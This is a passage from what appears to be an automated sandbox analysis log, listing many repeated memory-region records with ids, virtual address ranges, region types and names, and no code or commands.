start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10779 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10780 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10781 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10782 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10783 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10784 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10785 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10786 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10787 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10788 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10789 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10790 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 10791 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10792 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10793 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10794 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10795 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10801 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10802 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10803 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10804 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10805 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10806 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10807 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10808 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 10809 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10810 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10811 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10812 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10813 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10814 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10815 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10816 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10817 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10818 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10819 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10820 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10821 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10822 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10823 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10824 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10825 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10826 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10827 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10828 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10829 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10968 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10969 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 10970 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 10971 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 10972 start_va = 0x2a0000 end_va = 
0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10973 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10974 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10975 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10976 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10977 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10978 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10979 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10980 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10981 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10982 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10983 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10984 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10985 
start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10986 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10987 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10988 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10989 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10990 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10991 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10992 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10993 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10994 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10995 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10996 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10997 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 10998 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10999 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11000 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11001 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11002 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11003 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11004 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11005 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11006 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11007 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11008 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11009 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11010 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 11011 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11012 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11013 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11014 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11015 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11016 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11017 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11023 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11024 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11025 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 11026 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 11027 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 11028 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 11029 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11030 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11031 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11032 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11033 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11034 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11035 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11036 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11037 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11038 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11039 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11040 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11041 start_va = 0x2a0000 end_va = 0x2b0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11042 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11043 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11044 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11045 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11046 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11047 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11048 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11049 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11050 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11051 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11052 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11053 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11054 start_va 
= 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11055 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11056 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11057 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11058 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11059 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11060 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11061 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11062 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11063 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11064 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11065 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11066 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 11067 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11068 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11069 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11070 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11071 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11072 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11103 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11104 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11105 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11106 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11107 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11108 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11229 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = 
"private_0x00000000002a0000" filename = "" Region: id = 11230 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 11231 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 11232 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 11233 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11234 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11235 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11236 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11237 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11238 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11239 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11240 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11241 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11242 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11243 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11244 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11245 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11246 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11247 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11248 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11249 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11250 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11251 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11252 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11253 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11254 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11255 start_va = 0x2a0000 end_va 
= 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11256 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11257 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11258 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11259 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11260 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11261 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11262 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11298 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11299 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11300 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11301 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11302 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 
